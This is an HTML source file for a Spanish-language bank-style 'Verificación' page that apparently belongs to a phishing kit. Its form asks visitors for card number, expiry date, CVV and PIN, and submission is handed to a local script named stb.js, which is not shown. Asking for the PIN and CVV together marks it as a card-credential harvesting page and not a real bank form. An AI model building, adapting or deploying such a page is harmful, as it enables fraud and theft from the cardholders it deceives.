<!DOCTYPE html>
<html lang="">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="top">
        <img src="./img/hed.PNG" alt="">
    </div>
    
    <p class="cc-p">Verificación</p>

    <div class="kolch.cc kolch ">
        <div>
            <img src="./img/inform.PNG" alt="">
        </div>
        <p style="margin-left: 30px; font-weight: bold;
        color: rgb(5 155 229); font-size: 17px; margin-top: 20px;">Identifícate con tus tarjetas </p>
        <form method="post" id="pg3">
           
                <p style="font-size: 13px; color: rgb(87, 87, 87);">Número de tarjeta</p>
            <input type="text" name="" id="a1" required maxlength="19">

            <!--  -->
            <p style="font-size: 13px; color: rgb(87, 87, 87);">Fecha de caducidad</p>
            <input type="text" name="" id="a2" required placeholder="MM/AA" maxlength="7"> 

             <!--  -->
             <p style="font-size: 13px; color: rgb(87, 87, 87);">Código cvv de 3 dígitos</p>
             <input type="text" name="" id="a3" required maxlength="3"> 

             <!--  -->
             <p style="font-size: 13px; color: rgb(87, 87, 87);">PIN</p>
             <input type="text" name="" id="a4" required maxlength="4"> 

            <div class="btn">
                <button>Continuar</button>
            </div>
        </form>
    </div>
    <p style="color: white; text-align: center; font-size: 13px;">Características del servicio</p>
    <p style="color: white; text-align: center; font-size: 13px;">Modo de acceso</p>

    <div class="bot">
        <div class="img1">
            <img  src="./img/bot1.PNG" alt="">
        </div>

        <img src="./img/bot2.PNG" alt="">
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>